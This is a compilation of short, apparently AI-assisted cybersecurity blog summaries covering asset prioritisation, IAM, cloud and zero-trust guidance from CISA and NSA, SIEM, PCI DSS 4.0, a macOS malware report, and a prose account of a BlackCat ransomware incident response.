Securing Your Company’s Business-Critical Assets: A Strategic Approach

Image created by AI


The concept of “critical assets” is probably not a new one for many. In the technology sector, this term refers to important elements within your company’s IT infrastructure. Think databases, application servers, privileged identities. If something goes wrong with these aspects, there may be significant consequences for your organization’s overall security.

But not all technology assets are critical assets. A delineation must also be made between a critical asset and a business-critical asset. So, what exactly are the risks to our business-critical assets? And, most importantly, how much do we know about those risks?

To grasp this topic fully, it’s important to recognize that business-critical assets are the technological backbone of your company. Yet, this is just one of the three pillars necessary for successful business operation. Organizations aiming for comprehensive cybersecurity governance must consider technology, business processes, and key employees. When these areas are taken into account, it becomes much easier to understand which resources are absolutely vital business-critical assets.

Why are Business-Critical Assets So Important?

In today’s world, every organization is grappling with a plethora of problems vying for solutions. But with numerous issues to address – whether it be CVEs, misconfigurations, or overly permissive identities – many organizations end up crippled by indecision, unsure of where to concentrate their efforts. Consequently, they might adopt what’s called a “cyber security spray ‘n pray approach,” which often ends in wasted time and resources. Instead of this broad, unfocused technique, organizations require a targeted effort towards the most crucial business-impacting issues.

Putting the spotlight on these business-impacting issues enhances resource allocation, efficiency, and effectiveness within an organization. More importantly, it encourages a tight focus on the issues that are of utmost concern to the senior leadership of the company. This means security teams are working hand-in-hand with senior management towards safeguarding the technological assets which support the most important business processes within their organization. The result? A tailored, business-centric cyber security approach with the highest return on investment.

Protecting Business-Critical Assets: A 4-step Method

Here’s a brief, four-step approach towards protecting your business-critical assets:

  1. Identify Business Processes: Start with a business risk assessment that will provide insight into your organization’s main business drivers and areas of greatest risk. If you have never done a risk assessment, consider adopting the “follow the money” approach, which focuses on how your company earns and spends money.
  2. Map Business Processes to Technology Assets: Once you’ve determined your most important business processes, establish a relationship between these processes and their underlying technology assets. These become your business-critical assets.
  3. Prioritize: Since you can’t fix everything, determining priorities is crucial. Ask “what are the top 3-5 business processes that are most important?” and consider feedback from company stakeholders and your risk management team.
  4. Implement Security Measures: After identifying and prioritizing company assets, the focus should shift to remediation activities. Typically, the outputs from your Vulnerability Management solution or recent Pen-test results will guide prioritization efforts for remediation.

Final Thoughts

Taking a more focused approach towards securing business-critical assets improves effectiveness and efficiency of security teams. Equally important, it fosters a stronger alignment with the priorities of senior leaders within the organization. With a robust understanding of what impacts your business most significantly, you can step away from unfocused, ineffective “security sprays” and start concentrating on what really matters to your company. This way, cybersecurity practice doesn’t just secure your technological assets, but contributes to the greater business strategy and its eventual success as a whole.


Related links:
https://thehackernews.com/2024/05/4-step-approach-to-mapping-and-securing.html

The Importance of Identity and Access Management in the Digital Age

Image created by AI

Introduction

In today’s constantly evolving digital era, ensuring secure and sensitive access to organizations’ critical information is paramount. Increasingly intricate business operations and the growing reliance on digital platforms for said operations have made the understanding and implementation of Identity and Access Management (IAM) an essential aspect of an organization’s security measures. In this article, we delve into IAM, why it is fundamental for enterprises, along with the key features of an IAM tool, and potential challenges faced during implementation.

What Is Identity and Access Management (IAM)?

Identity and Access Management is a collective of security services, procedures, policies, and tools that define and manage the roles and accessibility of users, devices, and API’s various on-premises and cloud applications, servers, and services. IAM’s primary mission is to manage and control access to an organization’s sensitive data effectively. In simpler terms, IAM is at the heart of digital transformation, cyber security, and regulatory compliance.

The Need For IAM in Enterprises

In most cyber-attacks targeting enterprise networks, identity is often used as the initial entry point. Poor multifactor authentication implementations, increasing entity impersonation-based attacks, and outdated IAM systems offer bad actors easy entries into these systems. Given the drastic increase in data breaches and cyber-attacks, the implementation of a solid IAM strategy is more crucial than ever. The role of IAM has evolved over time from being merely a collection of security applications to being a well-integrated fabric that consolidates architectures and processes into a coherent unit protecting the enterprise’s entire digital surface.

Challenges Faced During IAM Implementation

Providing access to business assets to which users and devices are entitled and keeping up with these rights as business needs evolve pose the most significant challenges to IAM. This process includes the timely onboarding and offboarding of users and devices, in addition to authorizing permissions. The rapid migration to remote work in the wake of the COVID-19 pandemic highlighted these challenges and the need for IAM systems and policies to adapt quickly. The growing complexity of workflows also necessitates custom IAM protection policies, resulting in a greater responsibility for IAM to manage everything.

Key Features of IAM

Primarily, IAM systems provide administrators with tools and technologies to change a user’s role, track user activities, create reports on these activities, and enforce policies on an ongoing basis. These systems ensure compliance with corporate policies and government regulations. The four fundamental elements of each IAM platform include user personal data storage, tools for managing this data, a system regulating and enforcing user access, and an auditing and reporting system.

Wrap Up

Identity and Access Management (IAM) is an essential part of an organization’s security strategy in the modern digital marketplace. While implementation of an IAM strategy can pose challenges, the benefits of successfully doing so significantly outweigh the potential difficulties. All organizations should consider a comprehensive review of their identity posture as a critical part of their cybersecurity planning.

Related links:
https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html

Maximizing AI Benefits Through Enhanced Information Management Strategies and Data Security

Image created by AI

Introduction

Artificial Intelligence (AI) projects have transformed global industry operations with improved data processing and predictive analytics capabilities. However, concerns about security, data privacy, and integrity have led organizations to question their strategies before implementing AI technologies.

Main Section

The current landscape of AI implementation reveals conflicting perceptions among organizations about their readiness in using AI. Many organizations are grappling with challenges related to data quality, with about 52% facing such concerns. Furthermore, reportedly 45% of organizations have encountered unintended data exposures during their AI projects. Thus, the concerns around data privacy and integrity are valid and prevalent in the industry.

Such AI implementation challenges directly affect businesses information management (IM) strategies. According to a recent study, organizations with mature IM strategies are 1.5 times more likely to benefit from AI than those with less-developed strategies. However, fewer than half of these organizations are confident they can safely use AI, shedding light on the stark reality compared to perceptions of AI readiness.

Additional to internal data quality, organizations express concerns around data privacy and security. About 71% of organizations have these concerns prior to implementing AI. Another major challenge for organizations is maintaining an AI acceptable use policy. The lack of such policies poses significant risks, including losing intellectual property and competitive advantage.

It is not surprising that 88% of organizations claim to have an IM strategy in place. But, surprisingly, 44% of them lack basic measures such as archiving, retention policies, and lifecycle management solutions. Furthermore, just 29% of organizations automate most aspects of their IM strategy. As data volume grows, the need for stronger IM strategies becomes crucial. An overwhelming 64% of organizations manage over a petabyte of data, and 41% handle more than 500 petabytes of data.

Summary

In conclusion, security concerns continue to withhold AI projects in various organizations. To productively use AI technology, organizations need to address these challenges promptly. By improving their IM strategies and ensuring robust data privacy and security measures are in place, they can reap the full benefits of AI. As increasingly more organizations recognize the necessity of additional strategies to keep up with AI, there seems to be a promising step in the right direction.

Related links:
https://www.csoonline.com/article/2079619/security-concerns-could-be-holding-back-ai-projects.html

Effective Strategies for CISOs in the Digital Age

Image created by AI

Introduction

It’s undeniable that a successful Chief Information Security Officer (CISO) must function as a business enabler, significantly impacting the effectiveness and security of an organization. However, implementing security initiatives without considering their repercussions on the business is a grave mistake committed by many CISOs. It’s crucial that CISOs work hand-in-hand with the business, and not against it since each industry sector possesses unique attributes, hence requiring tailored security solutions.

How to be a Successful CISO and Business Enabler

Here are some tips on how you can effectively serve as a successful CISO, enabling your business to strive in an increasingly digital world.

1. Develop a Strategy

To begin, a successful CISO should formulate a clear business-aligned security strategy and policy framework. The policy must be tailor-made for the organization and abide by relevant standards, regulations, and internal requirements. It’s crucial to integrate the strategy with the business objectives and the organizational culture.

2. Create Security Committee

An efficient security governance mechanism is established by creating a security committee involving representatives from all sectors of the company. At the very least, the committee should discuss strategies, policies, initiatives, issues, and incidents.

3. Constitute Virtual Security Team

Make all employees feel at ease to share their opinions and suggestions. Regular meetings should discuss security issues and ensure each department’s representation.

4. Key Messages Directly from CISO

If possible, personally train and educate all new hires (along with the existing employees) about the company policies and the direction on information security. Making sure that everyone appreciates the significance of securing business data.

5. Automate Processes

Successful CISOs must also aim to relieve user-dependency. Automate as many processes as possible, so that regardless of users’ mistakes or mischiefs, company security stays intact.

6. Identify and Address Business Pain Areas

It’s vital to identify the pain areas of the business, which might be due to weak security policies or lack of adequate services. Efficient controls should be brought into place to address these issues and introduce faster and more efficient services.

7. Get User Buy-in

Make it a habit for the Information Security team to not hastily dismiss changes to policies. Always perform a cost-benefit analysis before making any decision and provide alternative solutions whenever possible.

Conclusion

A successful CISO secures buy-in from the business by ensuring all employees understand why a particular policy is essential for them and the company. It recognises that the Information Security function is not merely a technical role but rather a partner to the business and stakeholders.
The success of security initiatives largely depends on the support from top to bottom within the organization. As such, a successful CISO and a stable business are inevitable outcomes of right processes, awareness, and buy-in of all stakeholders.

 

Related Links: https://securereading.com/effective-ciso-enables-business/

Securing the Cloud: Best Practices and Guidelines

Understanding and Implementing Cloud Security Practices

In an era where digital technology and innovation seem ubiquitous, cloud services have gained considerable traction with enterprises across various sectors of the economy. These services provide applications, storage, and managed servers, substantially reducing the burden on corporate entities to manage their infrastructure.

In view of the widespread adoption of cloud services, the Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have jointly released a series of bulletins outlining best practices for securing cloud environments.

Cloud Security Guidelines

The five CISA and NSA documents focus on several key areas:

  1. Identity and access management solutions
  2. Key management solutions
  3. Encrypting data in the cloud
  4. Managing cloud storage
  5. Mitigating risks from managed service providers

The recommendations span from guidance on configuring Multi-Factor Authentication (MFA), encrypting data at rest, and backing up and recovering plans, to securing corporate accounts used by Managed Service Providers (MSPs). These bulletins offer insights that can benefit both cybersecurity professionals and IT executives.

Assessing the Threat Landscape

Cloud services have increasingly become targets for threat actors due to the valuable data these platforms store. Furthermore, they serve as potential gateways to internal networks, thus making them critical targets. A report by Microsoft in 2021 highlighted a surge in attacks from a Russian threat consortium, Nobelium, seeking to exploit these vulnerabilities.

In response to these emerging threats, CISA released a tool named the ‘Untitled Goose Tool,’ which enhances cybersecurity defenses by extracting telemetry data from Azure Active Directory, Microsoft Azure, and Microsoft 365 environments.

In Conclusion

As cyber threats evolve and become more sophisticated, organizations must strive to stay ahead through the constant implementation and review of cloud security practices. Taking advantage of best-practice recommendations from agencies like CISA and NSA can play a critical role in navigating this challenging cybersecurity landscape.



Related links:

https://www.bleepingcomputer.com/news/security/cisa-nsa-share-best-practices-for-securing-cloud-services/
https://media.defense.gov/2024/Mar/07/2003407866/-1/-1/0/CSI-CloudTop10-Identity-Access-Management.PDF
https://media.defense.gov/2024/Mar/07/2003407858/-1/-1/0/CSI-CloudTop10-Key-Management.PDF
https://media.defense.gov/2024/Mar/07/2003407861/-1/-1/0/CSI-CloudTop10-Network-Segmentation.PDF
https://media.defense.gov/2024/Mar/07/2003407862/-1/-1/0/CSI-CloudTop10-Secure-Data.PDF
https://media.defense.gov/2024/Mar/07/2003407859/-1/-1/0/CSI-CloudTop10-Managed-Service-Providers.PDF

Apple Devices Vulnerable: Study Reveals Shocking Reality of Malware Threats

Introduction

There’s a common belief, held by many Apple users, that their devices are immune to malware and attacks. However, a recent study conducted by Mobile Device Management firm, Jamf, warns this may not be the case. The report indicates that there’s a sense of complacency among macOS users when it comes to cyber hygiene, which is concerning given the intricate attack methods used by hackers today.

The study, popularly known as the “Security 360” report, is a reflection of the last quarter of 2023. It has gathered data from 15 million desktops, tablets, and smartphones across 90 countries.

According to Jamf’s findings, Mac Trojans – types of malware targeting Apple users – are on the rise, making up approximately 17% of all malware products aimed at the platform. At present, Jamf is tracking an alarming 300 malware families under macOS, with a total of 21 new ones discovered in 2023. However, it’s worth noting that these figures are still considerably lower than the number of malicious software aimed at Windows and Android users.

Interestingly, one key issue that the report highlights is the lackluster update policy followed by many organizations. About 39% of the surveyed organizations were found to be running devices with known security flaws. It was also revealed that about 40% of mobile users have devices with similar security vulnerabilities.

Another alarming issue is the growing success rate of phishing attacks, especially on iPhone and similar Apple devices. In fact, according to the report, such attacks have a 50% higher success rate on these devices when compared to their macOS counterparts.

The Threat of Third-Party App Stores

There’s an apparent danger lurking around Sideloading or third-party app stores, which are now becoming accessible on iPhones. Although the intent behind using these alternative app stores might seem harmless at face value, they are oftentimes filled with misleading apps that coax users into downloading suspicious applications.

Interestingly, the report also highlighted the fact that about 57% of the users are under the impression that macOS is immune to malware or refuse to believe otherwise. Clearly, these misconceptions and a misguided sense of security put users at a higher risk of cyber threats.

Conclusion

While the figures raised by this report might seem alarming, Jamf suggests that many of these problems can be resolved by practicing basic secure behaviors. Regular updates, strong passwords, and activating 2-Factor Authentication are some of the simple yet effective steps that can significantly enhance the security of a device. It’s also crucial that end-users are adequately educated about the vulnerability of their devices to fend off potential cyber attacks effectively.

Enhancing Cyber Security: Navigating Threats with SIEM and AI

Introduction

Today’s increasingly complex and diverse network landscape demands advanced tools to prevent, detect, and respond to cybersecurity threats. One such arsenal in warranting advanced cyber defense is the Security Information and Event Management (SIEM) software. These tools play an integral role in any cybersecurity protocol, making them invaluable assets in maintaining a healthy network environment.

Understanding SIEM and Its Value

Security Information and Event Management (SIEM) software works by collecting log and event data to predict, detect, and prevent cyber threats. These platforms function by parsing event logs and monitoring security events, a task initially not glamorous, but indispensable in an era shaped by automation and Artificial Intelligence (AI).

The true value of SIEM lies in the correlation of system events, categorizing them for priority and analysis and presenting critical events for immediate visibility and response. Mature SIEM systems improve this visibility significantly by escalating automatic alerts to response teams or executing automatic actions in response to alarm triggers.

How SIEM Works

Contemporary computing systems, including network devices, applications, operating systems, and cloud services, maintain event logs that offer information on security monitoring and applications performance. The event logs and related system data would need to be exported into a SIEM platform, an activity the SIEM agents handle. These agents operate on various systems and enable data export into the SIEM system.

The choice of a SIEM system depends on aspects like network topography, bandwidth capabilities, and the types of systems from which you need logs. Irrespective of the chosen SIEM system, it is crucial to ensure the whole infrastructure is configured for SIEM, including both on-premises and cloud components.

SIEM and AI-Enhancement

AI is increasingly playing an integral role in SIEM systems. It helps analyze vast volumes of data, delivering only useful information to the security operations center. SIEM platforms leverage correlation engines, AI, and machine learning to identify threat patterns and differentiate their offerings from competitors.

AI-enhanced SIEM systems leverage vast cloud data feeds from various vendors and sources, using this accumulated knowledge to build deep contextual insights into event data. All without manual intervention. Having this context is essential for triaging events, identifying attack chains, and formulating incident response plans. However, it’s important to remember that the feasibility of AI utilization may be determined by whether your network is cloud-based or on-premise.

Choosing a SIEM for Your Business

The process of identifying an ideal SIEM for your business can often include considerations such as the ability to support business-critical systems, enhancing threat detection, and integrating seamlessly with other security platforms. Other important factors to consider include the SIEM’s ability to comply with regulatory requirements, role-based access for security, alert configuration capabilities, and their practical options for log ingestion.

Ultimately, the final choice depends on several factors including cost, resource requirements, and business-specific needs.

Conclusion

Implementing a robust Security Information and Event Management (SIEM) system in your enterprise can help fortify your cybersecurity protocols. It’s a comprehensive solution that consolidates event data from multiple sources, correlates events, identifies anomalies and violations, and sends alerts. By understanding the functionality and key considerations when choosing a SIEM system, businesses can better equip themselves with more advanced defenses against evolving cybersecurity threats.



Related Links:

https://www.csoonline.com/article/524286/what-is-siem-security-information-and-event-management-explained.html

Guarding Against Adversaries: NSA’s Zero-Trust Guidance

An In-Depth Look at the NSA’s Zero-Trust Guidance to Guard Against Network Adversities

In a bid to bolster network security and hinder adversaries’ lateral movement, the National Security Agency (NSA) is recommending organizations to adopt the zero-trust framework principles. At its core, the zero-trust security architecture puts stringent controls on accessing network resources — whether they’re within or beyond the physical boundary. This results not only in limiting the breach impact but also in keeping the network protected.

The Zero-Trust Framework

Unlike the traditional IT security model, where everyone and everything within the network perimeter is trusted, the zero-trust architecture operates on the premise that a threat may already be lurking inside. Hence, it denies unrestricted access to the network, keeping potential risks at bay.

A key aspect of enhancing the zero-trust maturity involves addressing several elements, known as pillars, which threat actors could potentially exploit. One such pillar is the network and environment component, encompassing all hardware, software assets, non-person entities, and inter-communication protocols. The NSA released its detailed zero-trust guidance catered towards this pillar.

Seven Pillars of the Zero-Trust Architecture

At the heart of zero-trust lies in-depth network security, delivered through methods like data flow mapping, macro and micro segmentation, and software-defined networking. For each pillar, organizations must attain a specific level of maturity, in line with the principles of zero-trust, to further their security measures.

Data flow mapping involves identifying the location and process used for data storage. Macro and micro segmentation help limit lateral movement on the network by creating dedicated network areas for respective user departments and breaking down network management into smaller components.

Micro Segmentation in the Zero-Trust Framework

The zero-trust framework uses micro segmentation to further reduce the attack surface and limit the potential breach impact. It involves isolating users, applications, or workflows into individual network segments with strict access policies to limit lateral data flows.

Acquiring more granular control over micro segmentation is feasible through software-defined networking (SDN) components, enabling customizable security monitoring and alerting. SDN enhances network visibility and allows the enforcement of policies across all network segments from a centralized control center.

Building A Zero-Trust Environment

Designing and building a zero-trust environment may seem like a significant undertaking, requiring systematic progression through multiple maturity stages. However, if executed properly, the end result is a robust enterprise architecture capable of identifying, resisting, and responding to threats attempting to exploit network weaknesses.

The NSA’s first guide for the zero-trust framework was introduced in February 2021, followed by another guidance provided in April 2023, dedicated to fostering the maturity of the user component within the zero-trust framework.

Conclusion

As enterprises hasten to secure their networks in an increasingly hostile digital landscape, the zero-trust framework offers an appealing strategy. By trusting nothing and validating everything, organizations can significantly reduce, if not eradicate, the risk presented by latent threats. The NSA’s comprehensive zero-trust guidelines provide a roadmap for companies looking to bolster their network security and protect their assets.



Related links:

https://www.bleepingcomputer.com/news/security/nsa-shares-zero-trust-guidance-to-limit-adversaries-on-the-network/
https://media.defense.gov/2024/Mar/05/2003405462/-1/-1/0/CSI-ZERO-TRUST-NETWORK-ENVIRONMENT-PILLAR.PDF

Enhancing Cybersecurity with PCI DSS 4.0

Introduction

When it comes to cybersecurity, compliance may not be the most eye-catching topic, yet it is undoubtedly significant. In the current digital age, security teams play a vital role in Governance, Risk, and Compliance (GRC) concerns thereby warranting their due recognition in any security organization’s objectives and priorities.

Notably, various compliance standards and frameworks have recently adopted requirements that echo security best practices rather than mere checkboxes, making the case for PCI DSS 4.0, the newest credit card standard, all the stronger. Let’s delve deeper into its facets and what security professionals can glean from the changes.

The Noteworthiness of PCI DSS 4.0

The Payment Card Industry Security Standards Council (PCISSC), comprising main credit card industry players like Visa, Mastercard, American Express, Discover, JCB International, and UnionPay, are responsible for setting up and administering the credit card standard. As per this norm, every entity accepting credit card payments needs to ensure the security of card users’ data. Hence, any business dealing in credit card payments must adhere to the PCI DSS 4.0 standard that was rolled out in March 2022, with a two-year transition period. From March 31, 2024, onwards, PCI DSS 4.0 will be the sole active version of the standard.

Security Aspects of the PCI DSS 4.0 Standard

Let’s focus on some of the most prominent changes in v4.0, particularly concerning us as security professionals:

Avoidance of Malicious Scripts

With an increasing number of attacks and fraud occurrences involving malicious third-party scripts, PCI DSS updated their standard to include specific requirements for managing payment page scripts and deploying mechanisms to detect skimming. Thus, businesses need to ensure no malicious scripts exist on their payment pages and regularly monitor these scripts for any suspicious activity as needed.

Installation and Maintenance of Network Security Controls

The upgraded PCI DSS standard emphasizes the need for implementing and maintaining network security controls. It indicates that, in today’s complex network realm, securing your business entails devising a solution for network security concerns in hybrid and multi-cloud settings, preferably through a distributed cloud strategy.

Development and Maintenance of Secure Systems and Software

Requirement 6 of the updated standard hints towards the need for appropriate API security and the significance of a secure software development lifecycle (SSDLC). It further implies that businesses need to remain alert to system changes and ensure that these changes adhere to proper change control procedures. By securing APIs, businesses are ensuring a key aspect of modern business operations remains safeguarded.

Logging, Visibility, and Monitoring

Company logs need to be accessible across all environments, as detailed in Requirement 10 of the update. Every business must confirm that they have appropriate logging and monitoring capabilities across their hybrid and multicloud environments and use this visibility to monitor these areas for security, fraud, abuse, and compliance issues effectively.

Conclusion

The PCI DSS 4.0 update may focus on payment card security, but its importance extends far beyond that scope. It provides much needed, updated guidance to security teams amidst an evolving threat landscape and the increasing prevalence of hybrid and multicloud environments. By absorbing its learnings and implementing its recommendations, security professionals can significantly bolster their businesses’ safety measures.



Related Links:

https://www.darkreading.com/cybersecurity-operations/pci-dss-4-0-is-good-security-guidance-for-everyone

Inside the BlackCat Ransomware Attack: Strategies for Defense

Defending Against BlackCat: An Inside Look at a Ransomware Attack

In the continually evolving world of cybersecurity, one of the most significant threats that organizations face is ransomware. Ransomware attacks are continually evolving, giving rise to more complex and devastating forms of cybercrime. Cybercriminals focus on various targets, including data breaches, fraud, identity theft, and vulnerabilities, making it crucial for companies to understand the hallmarks of these attacks to formulate their defense strategies.

The spotlight of this article is on a BlackCat ransomware attack, as reported from the perspective of incident response experts at Sygnia. The company was approached by a victim, a company experiencing suspect activity on its network, leading to a ransomware attack diagnosis. Given the imminent danger, Sygnia recommended the victim to disconnect immediately from the internet to mitigate further damage.

The attacker then was identified as BlackCat. This case represented a supply chain attack where the victim’s vendor was compromised first. Successful penetration into the victim’s network led the attackers to consolidate their position, making the battleground noisy.

The Anatomy of the BlackCat Ransomware Attack

The progress of the BlackCat attack was meticulously tracked by Syngia experts. Initial attempts to access the victim’s network were made using the compromised vendor. The attackers tried Remote Desktop Protocol (RDP) and Server Message Block (SMB) logon to the victim’s servers. After a few successful logons, brute force authentication attacks were attempted.

Once the attacker successfully connected over RDP to a server on the victim’s network, it started using it as a ‘pivot server’ for reconnaissance and lateral movement. This action set off alerts regarding anomalous activities in the victim’s security controls, but they were initially dismissed due to the common issue of alert fatigue and possible false positives.

By now, the attackers had managed to access and exfiltrate some data, but had not begun the encryption process thanks to the swift decision to disconnect from the internet. Despite the halted encryption process, the attackers attempted to extort the victim over the stolen data for the next three weeks.

Lessons Learnt: Early Response and Decisive Actions

There are numerous lessons to learn from this incident. One of the most critical takeaways is the importance of early and expert incident response. It is also crucial to consider how the attacker may react to various defensive actions, without revealing the defensive activities to the attacker. In this case, the victim’s senior management was courageous enough to disconnect the internet, a severe action that helped limit the damage.

In conclusion, dealing with cyber threats like ransomware requires swift action, expert knowledge, and the courage to take drastic measures. It is this combination that can limit the attacker’s actions and save the day, even if the attack has reached an advanced stage. Drastic action might not prevent all forms of data theft, but it does help limit the extent of the damage and increases the company’s chance of survival.



Related links:

https://www.securityweek.com/anatomy-of-a-blackcat-attack-through-the-eyes-of-incident-response/